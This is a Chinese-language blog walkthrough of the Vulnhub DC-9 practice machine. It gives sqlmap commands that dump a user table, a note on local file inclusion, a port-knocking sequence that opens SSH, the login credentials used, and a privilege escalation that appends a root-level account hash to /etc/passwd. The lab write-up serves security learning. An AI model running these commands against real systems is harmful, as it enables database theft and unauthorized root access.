Vulnhub靶机 DC-9

哇,开心了,DC系列最后一个,加油!

在这里插入图片描述
135是靶机
80 22端口
访问主页

在这里插入图片描述在这里插入图片描述
bp抓了一下包,看着应该可以注入,跑一下sqlmap

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

列出了一堆账号密码

sqlmap -u "http://192.168.0.135/results.php" --data "search=1" --dbs
sqlmap -u "http://192.168.0.135/results.php" --data "search=1" -D users --tables
sqlmap -u "http://192.168.0.135/results.php" --data "search=1" -D users -T UserDetails --columns
sqlmap -u "http://192.168.0.135/results.php" --data "search=1" -D users -T UserDetails -C username,password --dump

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

另外一个库,发现admin

在这里插入图片描述
登录一下
File does not exist
可能是LFI漏洞

在这里插入图片描述
真的是
ssh不能利用
端口敲门
端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

在这里插入图片描述

7469,8475,9842

在这里插入图片描述
nmap是有顺序的
显示7469,然后8475,最后9842
要不然ssh端口还是关闭的

nmap -p 7469 192.168.0.135
nmap -p 8475 192.168.0.135
nmap -p 9842 192.168.0.135

在这里插入图片描述

试了一下admin,不能登录
换之前的另外一张表的账号

在这里插入图片描述

在这里插入图片描述
应该用hydra爆破的
但是不知道为啥我没跑出来
搜了一下别人的

在这里插入图片描述

在这里插入图片描述在这里插入图片描述
账号:fredy
密码:B4-Tru3-001

在这里插入图片描述

登录进去查看
/opt/devstuff/dist/test/test
不需要密码

在这里插入图片描述

含义:3个参数,将第二个参数的文件内容增加在第三个参数文件里面。

在这里插入图片描述
先生成一个密码的hash值
将账号写入文件
运行test
切换账号
拿到flag!

echo 'lez:$1$lez$UZwzHnEcAuQQfGcnJQOJh/:0:0::/root:/bin/bash' >> /tmp/lez
sudo ./test /tmp/lez /etc/passwd

做的有点多了今天,有点累
做的越多就越发现
要学的东西越来越多
加油吧少年!

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值